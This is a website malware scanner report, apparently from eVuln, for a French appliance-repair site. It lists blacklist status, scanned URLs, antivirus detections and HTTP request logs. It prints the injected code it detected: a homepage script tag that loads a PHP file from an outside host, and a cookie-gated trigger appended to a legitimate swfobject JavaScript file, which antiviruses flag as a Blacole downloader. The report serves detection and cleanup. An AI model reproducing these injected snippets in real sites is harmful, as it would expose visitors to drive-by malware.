New scan:

Malware Scanner report for depannage-electromenager-charenton-le-pont.com

Malicious/Suspicious/Total urls checked
1/1/4
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "depannage-electromenager-charenton-le-pont.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=depannage-electromenager-charenton-le-pont.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://depannage-electromenager-charenton-le-pont.com/
200 OK
Content-Length: 6849
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://akadem-servi-ru.1gb.ru/ahICzqW9.php?id=25981210"></script>

http://depannage-electromenager-charenton-le-pont.com/Scripts/AC_RunActiveContent.js
404 Not Found
Content-Length: 228
Content-Type: text/html
clean
http://depannage-electromenager-charenton-le-pont.com/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://depannage-electromenager-charenton-le-pont.com/Scripts/swfobject_modified.js
200 OK
Content-Length: 23442
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var swfobject = function() {

var UNDEF = "undefined",
OBJECT = "object",
SHOCKWAVE_FLASH = "Shockwave Flash",
SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash",
FLASH_MIME_TYPE = "application/x-shockwave-flash",
EXPRESS_INSTALL_ID = "SWFObjectExprInst",

win = window,
doc = document,
nav = navigator,

domLoadFnArr = [],
regObjArr = [],
timer = null,
storedAltContent = null,
storedAltContentId
... 20200 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name "=" ); var len = start name.length 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');tysnz09();}}

Antivirus reports:

AntiVir
HTML/Rce.Gen
Avast
JS:Includer-AJE [Trj]
Bkav
MW.Clod1f7.Trojan.ccb0
Ikarus
Trojan.JS.IFrame
TrendMicro-HouseCall
TROJ_GEN.F47V1126
Comodo
UnclassifiedMalware
Microsoft
Trojan:JS/Quidvetis.A
Fortinet
JS/Blacole.EU!tr.dldr
Norman
Blacole.XE


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: depannage-electromenager-charenton-le-pont.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Jul 2014 16:17:13 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6849
Content-Type: text/html
Set-Cookie: startBAK=R3415750288; path=/; expires=Sat, 05-Jul-2014 17:25:28 GMT
Set-Cookie: start=R118742758; path=/; expires=Sat, 05-Jul-2014 17:15:26 GMT

...6849 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: depannage-electromenager-charenton-le-pont.com
Referer: http://www.google.com/search?q=depannage-electromenager-charenton-le-pont.com

Result:
The result is similar to the first query. There are no suspicious redirects found.